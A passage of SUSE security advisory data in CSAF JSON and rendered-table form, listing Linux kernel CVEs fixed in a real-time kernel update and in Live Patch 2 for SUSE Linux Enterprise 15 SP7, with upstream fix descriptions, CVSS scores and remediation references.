"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23209",
"url": "https://www.suse.com/security/cve/CVE-2026-23209"
},
{
"category": "external",
"summary": "SUSE Bug 1258518 for CVE-2026-23209",
"url": "https://bugzilla.suse.com/1258518"
},
{
"category": "external",
"summary": "SUSE Bug 1258784 for CVE-2026-23209",
"url": "https://bugzilla.suse.com/1258784"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "important"
}
],
"title": "CVE-2026-23209"
},
{
"cve": "CVE-2026-23268",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23268"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\napparmor: fix unprivileged local user can do privileged policy management\n\nAn unprivileged local user can load, replace, and remove profiles by\nopening the apparmorfs interfaces, via a confused deputy attack, by\npassing the opened fd to a privileged process, and getting the\nprivileged process to write to the interface.\n\nThis does require a privileged target that can be manipulated to do\nthe write for the unprivileged process, but once such access is\nachieved full policy management is possible and all the possible\nimplications that implies: removing confinement, DoS of system or\ntarget applications by denying all execution, by-passing the\nunprivileged user namespace restriction, to exploiting kernel bugs for\na local privilege escalation.\n\nThe policy management interface can not have its permissions simply\nchanged from 0666 to 0600 because non-root processes need to be able\nto load policy to different policy namespaces.\n\nInstead ensure the task writing the interface has privileges that\nare a subset of the task that opened the interface. This is already\ndone via policy for confined processes, but unconfined can delegate\naccess to the opened fd, by-passing the usual policy check.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23268",
"url": "https://www.suse.com/security/cve/CVE-2026-23268"
},
{
"category": "external",
"summary": "SUSE Bug 1258850 for CVE-2026-23268",
"url": "https://bugzilla.suse.com/1258850"
},
{
"category": "external",
"summary": "SUSE Bug 1259859 for CVE-2026-23268",
"url": "https://bugzilla.suse.com/1259859"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "important"
}
],
"title": "CVE-2026-23268"
},
{
"cve": "CVE-2026-23269",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23269"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\napparmor: validate DFA start states are in bounds in unpack_pdb\n\nStart states are read from untrusted data and used as indexes into the\nDFA state tables. The aa_dfa_next() function call in unpack_pdb() will\naccess dfa-\u003etables[YYTD_ID_BASE][start], and if the start state exceeds\nthe number of states in the DFA, this results in an out-of-bound read.\n\n==================================================================\n BUG: KASAN: slab-out-of-bounds in aa_dfa_next+0x2a1/0x360\n Read of size 4 at addr ffff88811956fb90 by task su/1097\n ...\n\nReject policies with out-of-bounds start states during unpacking\nto prevent the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23269",
"url": "https://www.suse.com/security/cve/CVE-2026-23269"
},
{
"category": "external",
"summary": "SUSE Bug 1259857 for CVE-2026-23269",
"url": "https://bugzilla.suse.com/1259857"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "moderate"
}
],
"title": "CVE-2026-23269"
}
]
}
SUSE-SU-2026:1132-1
Vulnerability from csaf_suse - Published: 2026-03-27 16:04 - Updated: 2026-03-27 16:04Summary
Security update for the Linux Kernel (Live Patch 2 for SUSE Linux Enterprise 15 SP7)
Severity
Important
Notes
Title of the patch: Security update for the Linux Kernel (Live Patch 2 for SUSE Linux Enterprise 15 SP7)
Description of the patch:
This update for the SUSE Linux Enterprise Kernel 6.4.0-150700.53.6 fixes various security issues
The following security issues were fixed:
- CVE-2025-38488: smb: client: fix use-after-free in crypt_message when using async crypto (bsc#1247240).
- CVE-2025-40258: mptcp: fix race condition in mptcp_schedule_work() (bsc#1255053).
- CVE-2025-40284: Bluetooth: MGMT: cancel mesh send timer when hdev removed (bsc#1257669).
- CVE-2025-40297: net: bridge: fix use-after-free due to MST port state bypass (bsc#1255895).
- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255378).
- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).
- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).
- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).
Patchnames: SUSE-2026-1132,SUSE-SLE-Module-Live-Patching-15-SP7-2026-1132
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
7.8 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.8 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.3 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
References
44 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for the Linux Kernel (Live Patch 2 for SUSE Linux Enterprise 15 SP7)",
"title": "Title of the patch"
},
{
"category": "description",
"text": "\nThis update for the SUSE Linux Enterprise Kernel 6.4.0-150700.53.6 fixes various security issues\n\nThe following security issues were fixed:\n\n- CVE-2025-38488: smb: client: fix use-after-free in crypt_message when using async crypto (bsc#1247240).\n- CVE-2025-40258: mptcp: fix race condition in mptcp_schedule_work() (bsc#1255053).\n- CVE-2025-40284: Bluetooth: MGMT: cancel mesh send timer when hdev removed (bsc#1257669).\n- CVE-2025-40297: net: bridge: fix use-after-free due to MST port state bypass (bsc#1255895).\n- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255378).\n- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).\n- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).\n- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2026-1132,SUSE-SLE-Module-Live-Patching-15-SP7-2026-1132",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_1132-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:1132-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261132-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:1132-1",
"url": "https://lists.suse.com/pipermail/sle-updates/2026-March/045151.html"
},
{
"category": "self",
"summary": "SUSE Bug 1247240",
"url": "https://bugzilla.suse.com/1247240"
},
{
"category": "self",
"summary": "SUSE Bug 1255053",
"url": "https://bugzilla.suse.com/1255053"
},
{
"category": "self",
"summary": "SUSE Bug 1255378",
"url": "https://bugzilla.suse.com/1255378"
},
{
"category": "self",
"summary": "SUSE Bug 1255402",
"url": "https://bugzilla.suse.com/1255402"
},
{
"category": "self",
"summary": "SUSE Bug 1255895",
"url": "https://bugzilla.suse.com/1255895"
},
{
"category": "self",
"summary": "SUSE Bug 1256624",
"url": "https://bugzilla.suse.com/1256624"
},
{
"category": "self",
"summary": "SUSE Bug 1256644",
"url": "https://bugzilla.suse.com/1256644"
},
{
"category": "self",
"summary": "SUSE Bug 1257669",
"url": "https://bugzilla.suse.com/1257669"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38488 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38488/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40258 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40258/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40284 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40284/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40297 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40297/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68284 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68284/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68285 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68285/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68813 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71085 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71085/"
}
],
"title": "Security update for the Linux Kernel (Live Patch 2 for SUSE Linux Enterprise 15 SP7)",
"tracking": {
"current_release_date": "2026-03-27T16:04:11Z",
"generator": {
"date": "2026-03-27T16:04:11Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:1132-1",
"initial_release_date": "2026-03-27T16:04:11Z",
"revision_history": [
{
"date": "2026-03-27T16:04:11Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le",
"product": {
"name": "kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le",
"product_id": "kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x",
"product": {
"name": "kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x",
"product_id": "kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64",
"product": {
"name": "kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64",
"product_id": "kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Live Patching 15 SP7",
"product": {
"name": "SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-live-patching:15:sp7"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le as component of SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le"
},
"product_reference": "kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x as component of SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x"
},
"product_reference": "kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64 as component of SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64"
},
"product_reference": "kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP7"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-38488",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38488"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix use-after-free in crypt_message when using async crypto\n\nThe CVE-2024-50047 fix removed asynchronous crypto handling from\ncrypt_message(), assuming all crypto operations are synchronous.\nHowever, when hardware crypto accelerators are used, this can cause\nuse-after-free crashes:\n\n crypt_message()\n // Allocate the creq buffer containing the req\n creq = smb2_get_aead_req(..., \u0026req);\n\n // Async encryption returns -EINPROGRESS immediately\n rc = enc ? crypto_aead_encrypt(req) : crypto_aead_decrypt(req);\n\n // Free creq while async operation is still in progress\n kvfree_sensitive(creq, ...);\n\nHardware crypto modules often implement async AEAD operations for\nperformance. When crypto_aead_encrypt/decrypt() returns -EINPROGRESS,\nthe operation completes asynchronously. Without crypto_wait_req(),\nthe function immediately frees the request buffer, leading to crashes\nwhen the driver later accesses the freed memory.\n\nThis results in a use-after-free condition when the hardware crypto\ndriver later accesses the freed request structure, leading to kernel\ncrashes with NULL pointer dereferences.\n\nThe issue occurs because crypto_alloc_aead() with mask=0 doesn\u0027t\nguarantee synchronous operation. Even without CRYPTO_ALG_ASYNC in\nthe mask, async implementations can be selected.\n\nFix by restoring the async crypto handling:\n- DECLARE_CRYPTO_WAIT(wait) for completion tracking\n- aead_request_set_callback() for async completion notification\n- crypto_wait_req() to wait for operation completion\n\nThis ensures the request buffer isn\u0027t freed until the crypto operation\ncompletes, whether synchronous or asynchronous, while preserving the\nCVE-2024-50047 fix.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38488",
"url": "https://www.suse.com/security/cve/CVE-2025-38488"
},
{
"category": "external",
"summary": "SUSE Bug 1247239 for CVE-2025-38488",
"url": "https://bugzilla.suse.com/1247239"
},
{
"category": "external",
"summary": "SUSE Bug 1247240 for CVE-2025-38488",
"url": "https://bugzilla.suse.com/1247240"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:04:11Z",
"details": "important"
}
],
"title": "CVE-2025-38488"
},
{
"cve": "CVE-2025-40258",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40258"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: fix race condition in mptcp_schedule_work()\n\nsyzbot reported use-after-free in mptcp_schedule_work() [1]\n\nIssue here is that mptcp_schedule_work() schedules a work,\nthen gets a refcount on sk-\u003esk_refcnt if the work was scheduled.\nThis refcount will be released by mptcp_worker().\n\n[A] if (schedule_work(...)) {\n[B] sock_hold(sk);\n return true;\n }\n\nProblem is that mptcp_worker() can run immediately and complete before [B]\n\nWe need instead :\n\n sock_hold(sk);\n if (schedule_work(...))\n return true;\n sock_put(sk);\n\n[1]\nrefcount_t: addition on 0; use-after-free.\n WARNING: CPU: 1 PID: 29 at lib/refcount.c:25 refcount_warn_saturate+0xfa/0x1d0 lib/refcount.c:25\nCall Trace:\n \u003cTASK\u003e\n __refcount_add include/linux/refcount.h:-1 [inline]\n __refcount_inc include/linux/refcount.h:366 [inline]\n refcount_inc include/linux/refcount.h:383 [inline]\n sock_hold include/net/sock.h:816 [inline]\n mptcp_schedule_work+0x164/0x1a0 net/mptcp/protocol.c:943\n mptcp_tout_timer+0x21/0xa0 net/mptcp/protocol.c:2316\n call_timer_fn+0x17e/0x5f0 kernel/time/timer.c:1747\n expire_timers kernel/time/timer.c:1798 [inline]\n __run_timers kernel/time/timer.c:2372 [inline]\n __run_timer_base+0x648/0x970 kernel/time/timer.c:2384\n run_timer_base kernel/time/timer.c:2393 [inline]\n run_timer_softirq+0xb7/0x180 kernel/time/timer.c:2403\n handle_softirqs+0x22f/0x710 kernel/softirq.c:622\n __do_softirq kernel/softirq.c:656 [inline]\n run_ktimerd+0xcf/0x190 kernel/softirq.c:1138\n smpboot_thread_fn+0x542/0xa60 kernel/smpboot.c:160\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40258",
"url": "https://www.suse.com/security/cve/CVE-2025-40258"
},
{
"category": "external",
"summary": "SUSE Bug 1254843 for CVE-2025-40258",
"url": "https://bugzilla.suse.com/1254843"
},
{
"category": "external",
"summary": "SUSE Bug 1255053 for CVE-2025-40258",
"url": "https://bugzilla.suse.com/1255053"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x",
